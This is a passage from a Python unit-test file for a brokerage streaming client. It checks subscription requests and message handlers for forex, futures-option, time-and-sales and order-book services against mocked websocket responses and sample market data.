'service': 'LEVELONE_FOREX',
'timestamp': 1590599267920,
'command': 'SUBS',
'content': [{
'key': 'EUR/GBP',
'delayed': False,
'assetMainType': 'FOREX',
'BID_PRICE': 0.8967,
'ASK_PRICE': 0.8969,
'LAST_PRICE': 0.8968,
'BID_SIZE': 1000000,
'ASK_SIZE': 1000000,
'TOTAL_VOLUME': 19000000,
'LAST_SIZE': 370000,
'QUOTE_TIME': 1590599267658,
'TRADE_TIME': 1590599267658,
'HIGH_PRICE': 0.8994,
'LOW_PRICE': 0.8896,
'CLOSE_PRICE': 0.894,
'EXCHANGE_ID': 'T',
'DESCRIPTION': 'Euro/GBPound Spot',
'OPEN_PRICE': 0.8901,
'NET_CHANGE': 0.0028,
'EXCHANGE_NAME': 'GFT',
'DIGITS': 2,
'SECURITY_STATUS': 'Unknown',
'TICK': 'UNUSED',
'TICK_AMOUNT': 'UNUSED',
'PRODUCT': 'UNUSED',
'TRADING_HOURS': 'UNUSED',
'IS_TRADABLE': 'UNUSED',
'MARKET_MAKER': 'UNUSED',
'HIGH_52_WEEK': 0.8994,
'LOW_52_WEEK': 0.8896,
'MARK': 0.8968
}, {
'key': 'EUR/USD',
'delayed': False,
'assetMainType': 'FOREX',
'BID_PRICE': 1.0976,
'ASK_PRICE': 1.0978,
'LAST_PRICE': 1.0977,
'BID_SIZE': 1000000,
'ASK_SIZE': 2800000,
'TOTAL_VOLUME': 633170000,
'LAST_SIZE': 10000,
'QUOTE_TIME': 1590599267658,
'TRADE_TIME': 1590599267658,
'HIGH_PRICE': 1.1031,
'LOW_PRICE': 1.0936,
'CLOSE_PRICE': 1.0893,
'EXCHANGE_ID': 'T',
'DESCRIPTION': 'Euro/USDollar Spot',
'OPEN_PRICE': 1.0982,
'NET_CHANGE': 0.0084,
'EXCHANGE_NAME': 'GFT',
'DIGITS': 2,
'SECURITY_STATUS': 'Unknown',
'TICK': 'UNUSED',
'TICK_AMOUNT': 'UNUSED',
'PRODUCT': 'UNUSED',
'TRADING_HOURS': 'UNUSED',
'IS_TRADABLE': 'UNUSED',
'MARKET_MAKER': 'UNUSED',
'HIGH_52_WEEK': 1.1031,
'LOW_52_WEEK': 1.0936,
'MARK': 1.0977
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LEVELONE_FUTURES_OPTIONS
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_subs_success_all_fields(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'NQU20_C6500,NQU20_P6500',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,' +
'19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_subs_success_some_fields(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'], fields=[
StreamClient.LevelOneFuturesOptionsFields.SYMBOL,
StreamClient.LevelOneFuturesOptionsFields.BID_SIZE,
StreamClient.LevelOneFuturesOptionsFields.ASK_SIZE,
StreamClient.LevelOneFuturesOptionsFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'NQU20_C6500,NQU20_P6500',
'fields': '0,4,5,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_subs_success_some_fields_no_symol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'], fields=[
StreamClient.LevelOneFuturesOptionsFields.BID_SIZE,
StreamClient.LevelOneFuturesOptionsFields.ASK_SIZE,
StreamClient.LevelOneFuturesOptionsFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'NQU20_C6500,NQU20_P6500',
'fields': '0,4,5,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'])
@no_duplicates
# TODO: Replace this with real messages
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'LEVELONE_FUTURES_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'NQU20_C6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'1': 2956,
'2': 2956.5,
'3': 2956.4,
'4': 3,
'5': 2,
'6': 'E',
'7': 'T',
'8': 1293,
'9': 6,
'10': 1590181200064,
'11': 1590181199726,
'12': 2956.6,
'13': 2956.3,
'14': 2956.25,
'15': '?',
'16': 'NASDAQ Call',
'17': '?',
'18': 2956.0,
'19': 0.1,
'20': 1.2,
'21': 'EXCH',
'22': 'Unknown',
'23': 19,
'24': 2955.9,
'25': 0.1,
'26': 100,
'27': 'NQU',
'28': '0.01',
'29': ('GLBX(de=1640;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'30': True,
'31': 100,
'32': True,
'33': 17.9,
'33': 'NQU',
'34': '2020-03-01'
}, {
'key': 'NQU20_C6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'1': 2957,
'2': 2958.5,
'3': 2957.4,
'4': 4,
'5': 3,
'6': 'Q',
'7': 'V',
'8': 1294,
'9': 7,
'10': 1590181200065,
'11': 1590181199727,
'12': 2956.7,
'13': 2956.4,
'14': 2956.26,
'15': '?',
'16': 'NASDAQ Put',
'17': '?',
'18': 2956.1,
'19': 0.2,
'20': 1.3,
'21': 'EXCH',
'22': 'Unknown',
'23': 20,
'24': 2956.9,
'25': 0.2,
'26': 101,
'27': 'NQU',
'28': '0.02',
'29': ('GLBX(de=1641;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'30': True,
'31': 101,
'32': True,
'33': 17.10,
'33': 'NQU',
'34': '2021-03-01'
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_futures_options_handler(handler)
self.client.add_level_one_futures_options_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'LEVELONE_FUTURES_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'NQU20_C6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'BID_PRICE': 2956,
'ASK_PRICE': 2956.5,
'LAST_PRICE': 2956.4,
'BID_SIZE': 3,
'ASK_SIZE': 2,
'ASK_ID': 'E',
'BID_ID': 'T',
'TOTAL_VOLUME': 1293,
'LAST_SIZE': 6,
'QUOTE_TIME': 1590181200064,
'TRADE_TIME': 1590181199726,
'HIGH_PRICE': 2956.6,
'LOW_PRICE': 2956.3,
'CLOSE_PRICE': 2956.25,
'EXCHANGE_ID': '?',
'DESCRIPTION': 'NASDAQ Call',
'LAST_ID': '?',
'OPEN_PRICE': 2956.0,
'NET_CHANGE': 0.1,
'FUTURE_PERCENT_CHANGE': 1.2,
'EXCHANGE_NAME': 'EXCH',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 19,
'MARK': 2955.9,
'TICK': 0.1,
'TICK_AMOUNT': 100,
'PRODUCT': 'NQU',
'FUTURE_PRICE_FORMAT': '0.01',
'FUTURE_TRADING_HOURS': ('GLBX(de=1640;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 100,
'FUTURE_IS_ACTIVE': True,
'FUTURE_SETTLEMENT_PRICE': 17.9,
'FUTURE_SETTLEMENT_PRICE': 'NQU',
'FUTURE_ACTIVE_SYMBOL': '2020-03-01'
}, {
'key': 'NQU20_C6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'BID_PRICE': 2957,
'ASK_PRICE': 2958.5,
'LAST_PRICE': 2957.4,
'BID_SIZE': 4,
'ASK_SIZE': 3,
'ASK_ID': 'Q',
'BID_ID': 'V',
'TOTAL_VOLUME': 1294,
'LAST_SIZE': 7,
'QUOTE_TIME': 1590181200065,
'TRADE_TIME': 1590181199727,
'HIGH_PRICE': 2956.7,
'LOW_PRICE': 2956.4,
'CLOSE_PRICE': 2956.26,
'EXCHANGE_ID': '?',
'DESCRIPTION': 'NASDAQ Put',
'LAST_ID': '?',
'OPEN_PRICE': 2956.1,
'NET_CHANGE': 0.2,
'FUTURE_PERCENT_CHANGE': 1.3,
'EXCHANGE_NAME': 'EXCH',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 20,
'MARK': 2956.9,
'TICK': 0.2,
'TICK_AMOUNT': 101,
'PRODUCT': 'NQU',
'FUTURE_PRICE_FORMAT': '0.02',
'FUTURE_TRADING_HOURS': ('GLBX(de=1641;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 101,
'FUTURE_IS_ACTIVE': True,
'FUTURE_SETTLEMENT_PRICE': 17.10,
'FUTURE_SETTLEMENT_PRICE': 'NQU',
'FUTURE_ACTIVE_SYMBOL': '2021-03-01'
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# TIMESALE_EQUITY
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_EQUITY', 'SUBS'))]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3,4')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_EQUITY', 'SUBS'))]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.TimesaleFields.SYMBOL,
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_EQUITY', 'SUBS'))]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'TIMESALE_EQUITY', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.timesale_equity_subs(['GOOG', 'MSFT'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'TIMESALE_EQUITY',
'timestamp': 1590599684016,
'command': 'SUBS',
'content': [{
'seq': 43,
'key': 'MSFT',
'1': 1590599683785,
'2': 179.64,
'3': 100.0,
'4': 111626
}, {
'seq': 0,
'key': 'GOOG',
'1': 1590599678467,
'2': 1406.91,
'3': 100.0,
'4': 8620
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'TIMESALE_EQUITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_timesale_equity_handler(handler)
self.client.add_timesale_equity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'TIMESALE_EQUITY',
'timestamp': 1590599684016,
'command': 'SUBS',
'content': [{
'seq': 43,
'key': 'MSFT',
'TRADE_TIME': 1590599683785,
'LAST_PRICE': 179.64,
'LAST_SIZE': 100.0,
'LAST_SEQUENCE': 111626
}, {
'seq': 0,
'key': 'GOOG',
'TRADE_TIME': 1590599678467,
'LAST_PRICE': 1406.91,
'LAST_SIZE': 100.0,
'LAST_SEQUENCE': 8620
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# TIMESALE_FUTURES
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_FUTURES', 'SUBS'))]
await self.client.timesale_futures_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': ('0,1,2,3,4')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_FUTURES', 'SUBS'))]
await self.client.timesale_futures_subs(['/ES', '/CL'], fields=[
StreamClient.TimesaleFields.SYMBOL,
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_FUTURES', 'SUBS'))]
await self.client.timesale_futures_subs(['/ES', '/CL'], fields=[
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'TIMESALE_FUTURES', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.timesale_futures_subs(['/ES', '/CL'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'TIMESALE_FUTURES',
'timestamp': 1590600568685,
'command': 'SUBS',
'content': [{
'seq': 0,
'key': '/ES',
'1': 1590600568524,
'2': 2998.0,
'3': 1.0,
'4': 9236856
}, {
'seq': 0,
'key': '/CL',
'1': 1590600568328,
'2': 33.08,
'3': 1.0,
'4': 68989244
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'TIMESALE_FUTURES', 'SUBS')),
json.dumps(stream_item)]
await self.client.timesale_futures_subs(['/ES', '/CL'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_timesale_futures_handler(handler)
self.client.add_timesale_futures_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'TIMESALE_FUTURES',
'timestamp': 1590600568685,
'command': 'SUBS',
'content': [{
'seq': 0,
'key': '/ES',
'TRADE_TIME': 1590600568524,
'LAST_PRICE': 2998.0,
'LAST_SIZE': 1.0,
'LAST_SEQUENCE': 9236856
}, {
'seq': 0,
'key': '/CL',
'TRADE_TIME': 1590600568328,
'LAST_PRICE': 33.08,
'LAST_SIZE': 1.0,
'LAST_SEQUENCE': 68989244
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# TIMESALE_OPTIONS
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_OPTIONS', 'SUBS'))]
await self.client.timesale_options_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': ('0,1,2,3,4')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_OPTIONS', 'SUBS'))]
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.TimesaleFields.SYMBOL,
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_success_some_fields_no_symbol(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_OPTIONS', 'SUBS'))]
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'TIMESALE_OPTIONS', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
@no_duplicates
# TODO: Replace this with real messages
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'TIMESALE_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG_052920C620',
'delayed': False,
'1': 1590181199726,
'2': 1000,
'3': 100,
'4': 9990
}, {
'key': 'MSFT_052920C145',
'delayed': False,
'1': 1590181199727,
'2': 1100,
'3': 110,
'4': 9991
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'TIMESALE_OPTIONS', 'SUBS')),
json.dumps(stream_item)]
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_timesale_options_handler(handler)
self.client.add_timesale_options_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'TIMESALE_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG_052920C620',
'delayed': False,
'TRADE_TIME': 1590181199726,
'LAST_PRICE': 1000,
'LAST_SIZE': 100,
'LAST_SEQUENCE': 9990
}, {
'key': 'MSFT_052920C145',
'delayed': False,
'TRADE_TIME': 1590181199727,
'LAST_PRICE': 1100,
'LAST_SIZE': 110,
'LAST_SEQUENCE': 9991
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LISTED_BOOK
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_listed_book_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LISTED_BOOK', 'SUBS'))]
await self.client.listed_book_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LISTED_BOOK',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_listed_book_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LISTED_BOOK', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.listed_book_subs(['GOOG', 'MSFT'])
##########################################################################
# NASDAQ_BOOK
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_nasdaq_book_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'NASDAQ_BOOK', 'SUBS'))]
await self.client.nasdaq_book_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'NASDAQ_BOOK',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_nasdaq_book_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'NASDAQ_BOOK', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.nasdaq_book_subs(['GOOG', 'MSFT'])
##########################################################################
# OPTIONS_BOOK
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_options_book_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTIONS_BOOK', 'SUBS'))]
await self.client.options_book_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTIONS_BOOK',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': ('0,1,2,3')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_options_book_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'OPTIONS_BOOK', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.options_book_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
##########################################################################
# Common book handler functionality
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_listed_book_handler(self, ws_connect):
async def subs():
await self.client.listed_book_subs(['GOOG', 'MSFT'])
def register_handler():
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_listed_book_handler(handler)
self.client.add_listed_book_handler(async_handler)
return handler, async_handler
return await self.__test_book_handler(
ws_connect, 'LISTED_BOOK', subs, register_handler)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_nasdaq_book_handler(self, ws_connect):
async def subs():
await self.client.nasdaq_book_subs(['GOOG', 'MSFT'])
def register_handler():
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_nasdaq_book_handler(handler)
self.client.add_nasdaq_book_handler(async_handler)
return handler, async_handler
return await self.__test_book_handler(
ws_connect, 'NASDAQ_BOOK', subs, register_handler)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_options_book_handler(self, ws_connect):
async def subs():
await self.client.options_book_subs(['GOOG', 'MSFT'])
def register_handler():
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_options_book_handler(handler)
self.client.add_options_book_handler(async_handler)
return handler, async_handler
return await self.__test_book_handler(
ws_connect, 'OPTIONS_BOOK', subs, register_handler)
@no_duplicates
async def __test_book_handler(
self, ws_connect, service, subs, register_handler):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': service,
'timestamp': 1590532470149,
'command': 'SUBS',
'content': [
{
'key': 'MSFT',
'1': 1590532442608,
'2': [
{
'0': 181.77,
'1': 100,
'2': 1,
'3': [
{
'0': 'edgx',
'1': 100,
'2': 63150257
}
]
},
{
'0': 181.75,
'1': 545,
'2': 2,
'3': [
{
'0': 'NSDQ',
'1': 345,
'2': 62685730
},
{
'0': 'arcx',
'1': 200,
'2': 63242588
}
]
},
{
'0': 157.0,
'1': 100,
'2': 1,
'3': [
{
'0': 'batx',
'1': 100,
